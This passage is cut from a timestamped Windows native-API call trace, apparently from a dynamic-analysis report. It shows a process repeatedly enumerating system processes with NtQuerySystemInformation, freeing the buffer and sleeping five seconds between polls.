NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0197.239] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0197.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0197.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0197.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0197.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0197.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0197.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0197.350] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0197.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0197.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0197.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0197.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0197.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0197.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0197.678] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0197.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0197.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0197.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0197.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0197.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0197.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0197.839] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0197.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0197.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0197.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0197.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0197.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0197.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0197.971] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0197.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0197.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0197.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0197.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0197.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0198.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0198.121] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0198.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0198.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0198.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0198.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0198.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0198.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0198.290] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0198.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0198.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0198.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0198.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0198.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0198.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0198.678] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0198.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0198.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0198.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0198.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0198.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0199.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0199.141] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0199.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0199.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0199.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0199.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0199.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0199.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0199.343] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0199.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0199.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0199.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0199.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0199.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0199.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0199.596] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0199.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0199.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0199.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0199.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0199.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0200.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0200.189] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0200.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0200.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0200.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0200.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0200.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0200.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0200.744] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0200.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0200.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0200.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0200.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0200.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0200.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0200.872] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0200.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0200.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0200.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0200.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0200.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0201.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0201.014] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0201.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0201.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0201.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0201.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0201.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0201.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0201.154] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0201.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0201.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0201.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0201.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0201.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0201.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0201.272] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0201.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0201.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0201.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0201.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0201.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0201.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0201.390] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0201.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0201.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0201.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0201.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0201.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0201.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0201.545] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0201.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0201.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0201.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0201.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0201.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0201.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0201.697] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0201.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0201.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0201.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0201.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0201.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0201.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0201.827] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0201.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0201.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0201.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0201.831] 